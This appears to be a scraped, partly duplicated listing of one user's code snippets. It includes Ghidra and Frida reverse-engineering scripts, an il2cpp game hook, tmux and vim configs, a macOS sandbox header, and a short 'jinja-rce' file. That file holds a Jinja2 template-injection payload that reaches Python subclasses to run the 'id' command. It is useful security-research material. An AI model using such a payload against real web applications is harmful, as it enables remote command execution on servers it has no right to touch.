iddoeldor

## get_classes.py
from ghidra.program.model.address import Address
from ghidra.program.model.mem import MemoryAccessException
from ghidra.program.flatapi import FlatProgramAPI
from ghidra.util.task import TaskMonitor

import math
import json
from os.path import isfile, join, dirname
import struct as st
import string

## index.ts
import { log } from "./logger";
import { AssertionError } from "assert";

const libil2cpp = Process.getModuleByName("libil2cpp.so");
const libil2cppb = libil2cpp.base;
const playerinfo_serialize = libil2cppb.add(0x6c2e30);
const playerinfo_deserialize = libil2cppb.add(0x6c316c);

console.log("Starting script..");
function readString(pointr:NativePointer){

## .tmux.conf
# Set the prefix to ^A.
unbind C-b
set -g prefix ^A
bind a send-prefix

# Start windows and panes at 1, not 0
set -g base-index 1
set -g pane-base-index 1
set -g renumber-windows on

## .vimrc
" plugins
let need_to_install_plugins = 0
if empty(glob('~/.vim/autoload/plug.vim'))
    silent !curl -fLo ~/.vim/autoload/plug.vim --create-dirs
        \ https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim
    let need_to_install_plugins = 1
endif

call plug#begin()
Plug 'tpope/vim-sensible'

## frida.vim
command! -nargs=+ FridaV call FridaV(<f-args>)
command! -nargs=+ Frida call Frida(<f-args>)

function! FridaV( ... )
    let class = split(a:1,"\\V.")
    let last = class[len(class)-1]
    let S = ":normal i"
    let S .= "\tvar %s = Java.use(\"%s\")\n"
    execute printf(S,last,a:1)
    call Frida(last,a:2,a:3)

## .vimrc
scriptencoding utf-8 " basic
set nocompatible " basic
filetype off " basic
filetype plugin on " Enable filetype plugins
filetype indent on " Enable loading the indent file for specific file types
syntax enable " Enable syntax highlighting
set encoding=utf-8 " Encoding (needed in youcompleteme)
set fileencoding=utf-8 " The encoding written to file.
set noerrorbells " No annoying sound on errors
set number " Line numbers on

## frida-hook-generator.py
from pyclibrary import CParser
import re


hook_template = '''
(function() {
	var name = '__NAME__';
	var address = Module.findExportByName(null, name);
	if (address != null) {
		console.log('[!] Hooking: ' + name + ' @ 0x' + address.toString(16));

## openssl-frida.js
const utils = {
	colors: {
		red: function(string) {
			return '\x1b[31m' + string + '\x1b[0m';
		},

		green: function(string) {
			return '\x1b[32m' + string + '\x1b[0m';
		},

## sandbox.h

// courtesy of clang
// https://github.com/applesrc/clang/blob/bb8f644/src/projects/compiler-rt/lib/sanitizer_common/sanitizer_mac_spi.cc

enum sandbox_filter_type {
	SANDBOX_FILTER_NONE,
	SANDBOX_FILTER_PATH,
	SANDBOX_FILTER_GLOBAL_NAME,
	SANDBOX_FILTER_LOCAL_NAME,
	SANDBOX_FILTER_APPLEEVENT_DESTINATION,

## jinja-rce-.py
import jinja2


# t = 'Variable {{ arg }}\n{% set a = arg.__class__.__base__.__subclasses__()  %}{% for i in a %}{{ i }}\n{% endfor %}'
t = 'Variable {{ arg }}\n{{ arg.__class__.__base__.__subclasses__()[-36]("id") }}'
template = jinja2.Template(t)
r = template.render(arg="testing")
print(r)
	from ghidra.program.model.address import Address
	from ghidra.program.model.mem import MemoryAccessException
	from ghidra.program.flatapi import FlatProgramAPI
	from ghidra.util.task import TaskMonitor

	import math
	import json
	from os.path import isfile, join, dirname
	import struct as st
	import string
	import { log } from "./logger";
	import { AssertionError } from "assert";

	const libil2cpp = Process.getModuleByName("libil2cpp.so");
	const libil2cppb = libil2cpp.base;
	const playerinfo_serialize = libil2cppb.add(0x6c2e30);
	const playerinfo_deserialize = libil2cppb.add(0x6c316c);

	console.log("Starting script..");
	function readString(pointr:NativePointer){
	# Set the prefix to ^A.
	unbind C-b
	set -g prefix ^A
	bind a send-prefix

	# Start windows and panes at 1, not 0
	set -g base-index 1
	set -g pane-base-index 1
	set -g renumber-windows on
	" plugins
	let need_to_install_plugins = 0
	if empty(glob('~/.vim/autoload/plug.vim'))
	silent !curl -fLo ~/.vim/autoload/plug.vim --create-dirs
	\ https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim
	let need_to_install_plugins = 1
	endif

	call plug#begin()
	Plug 'tpope/vim-sensible'
	command! -nargs=+ FridaV call FridaV(<f-args>)
	command! -nargs=+ Frida call Frida(<f-args>)

	function! FridaV( ... )
	let class = split(a:1,"\\V.")
	let last = class[len(class)-1]
	let S = ":normal i"
	let S .= "\tvar %s = Java.use(\"%s\")\n"
	execute printf(S,last,a:1)
	call Frida(last,a:2,a:3)
	scriptencoding utf-8 " basic
	set nocompatible " basic
	filetype off " basic
	filetype plugin on " Enable filetype plugins
	filetype indent on " Enable loading the indent file for specific file types
	syntax enable " Enable syntax highlighting
	set encoding=utf-8 " Encoding (needed in youcompleteme)
	set fileencoding=utf-8 " The encoding written to file.
	set noerrorbells " No annoying sound on errors
	set number " Line numbers on
	from pyclibrary import CParser
	import re


	hook_template = '''
	(function() {
	var name = '__NAME__';
	var address = Module.findExportByName(null, name);
	if (address != null) {
	console.log('[!] Hooking: ' + name + ' @ 0x' + address.toString(16));
	const utils = {
	colors: {
	red: function(string) {
	return '\x1b[31m' + string + '\x1b[0m';
	},

	green: function(string) {
	return '\x1b[32m' + string + '\x1b[0m';
	},

	// courtesy of clang
	// https://github.com/applesrc/clang/blob/bb8f644/src/projects/compiler-rt/lib/sanitizer_common/sanitizer_mac_spi.cc

	enum sandbox_filter_type {
	SANDBOX_FILTER_NONE,
	SANDBOX_FILTER_PATH,
	SANDBOX_FILTER_GLOBAL_NAME,
	SANDBOX_FILTER_LOCAL_NAME,
	SANDBOX_FILTER_APPLEEVENT_DESTINATION,
	import jinja2


	# t = 'Variable {{ arg }}\n{% set a = arg.__class__.__base__.__subclasses__() %}{% for i in a %}{{ i }}\n{% endfor %}'
	t = 'Variable {{ arg }}\n{{ arg.__class__.__base__.__subclasses__()[-36]("id") }}'
	template = jinja2.Template(t)
	r = template.render(arg="testing")
	print(r)